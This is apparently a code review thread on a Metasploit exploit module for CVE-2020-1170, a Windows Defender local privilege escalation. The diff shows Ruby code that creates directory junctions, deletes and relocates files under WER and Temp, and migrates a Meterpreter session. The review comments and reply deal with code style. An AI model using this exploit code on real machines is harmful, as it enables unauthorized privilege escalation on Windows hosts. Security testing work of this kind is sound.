modules/exploits/windows/local/cve_2020_1170_windows_defender_lpe.rb

```diff
@@ -0,0 +1,223 @@
+  rescue Rex::Post::Meterpreter::RequestError
+    # Sandboxes could not allow to create a new process
+    # stdapi_sys_process_execute: Operation failed: Access is denied.
+    print_error('Operation failed. Trying to elevate the current process...')
+    process = client.sys.process.open
+    session.migrate(process.pid)
+    process.pid
+  end
+
+  def make_directory_junction(original_directory, target_directory)
+    print_status('Creating the directory junction...')
+    junction_creation_result = cmd_exec("cmd.exe /C \"mklink /J #{original_directory} #{target_directory}\"")
+    if junction_creation_result =~ /Junction created/
+      print_good('Junction was successfully created!')
+      return 1
+    elsif junction_creation_result =~ /file already exists/ # If the file already exists on the target...
+      return 2
+    else
+      print_error("Directory junction failed. Error code was (#{junction_creation_result['GetLastError']}): #{junction_creation_result['ErrorMessage']}")
+      return -1
+    end
+  end
+
+  def delete_existing_mpcmdrun_file_or_folder
+    mpcmdrun_path = 'C:\\Windows\\Temp\\MpCmdRun.log.bak'
+    result_file_deletion = rm_f(mpcmdrun_path) # Then we try to delete it as a file....
+
+    if result_file_deletion['GetLastError'] == 0
+      print_good("Deleted the already existing #{mpcmdrun_path} folder on the target successfully!")
+      return true
+    end
+
+    result_junction_deletion = rm_rf(mpcmdrun_path) # And as a directory junction or folder...
+
+    if result_junction_deletion['GetLastError'] == 0
+      print_good("Deleted the already existing #{mpcmdrun_path} file on the target successfully!")
+      return true
+    end
+
+    print_error("Looks like the #{mpcmdrun_path} file/folder already exists on this target, and we can't delete it.")
+    print_error("Error code (#{result_junction_deletion['GetLastError']}): #{result_junction_deletion['ErrorMessage']}")
+    return false
+  end
+
+  def move_folders_out_of_wer
+    relocation_dir = "#{datastore['WritableDir']}\\#{Rex::Text.rand_text_alpha(6..13)}"
+    print_status(relocation_dir)
+    print_status("Making the temp folder which will house the folders that we move out of the WER directory...")
+    mkdir(relocation_dir)
+    register_dir_for_cleanup(relocation_dir)
+
+    print_status("cd'ing to relocation directory and relocating the folders...")
+    cd(relocation_dir)
+    print_status("After CD...")
+
+    # I was going to use rename_file here but it doesn't forcibly move folders when
+    move_folder_result1 = cmd_exec("cmd.exe /C \"move /Y C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportArchive .")
+    print_status(move_folder_result1)
+    move_folder_result1 = cmd_exec("cmd.exe /C \"move /Y C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue .")
+    print_status(move_folder_result1)
+    move_folder_result1 = cmd_exec("cmd.exe /C \"move /Y C:\\ProgramData\\Microsoft\\Windows\\WER\\Temp .")
+    print_status(move_folder_result1)
```

Comment:
The comment appears to have been truncated.

Also, `move_folder_result1` is an unusual variable name choice, especially where there is no `move_folder_result2`.

Also, assigning these to a variable is kind of pointless as the response isn't checked.

Also, `cmd_exec` can return `nil` in some instances. Rather than die with a stacktrace here, it might be better to cast `to_s` and hope for the best.

```suggestion
    # I was going to use rename_file here but it doesn't forcibly move folders when
    print_status(cmd_exec("cmd.exe /C \"move /Y C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportArchive .").to_s)
    print_status(cmd_exec("cmd.exe /C \"move /Y C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue .").to_s)
    print_status(cmd_exec("cmd.exe /C \"move /Y C:\\ProgramData\\Microsoft\\Windows\\WER\\Temp .").to_s)
```

Bonus: this halves the number of lines of code and decreases line length.

Reply:
No need to actually print this out. Again this is WIP code, so these statements are purely for my own interest to check the code as I develop it. The plan was to remove these print statements once the code was fully developed.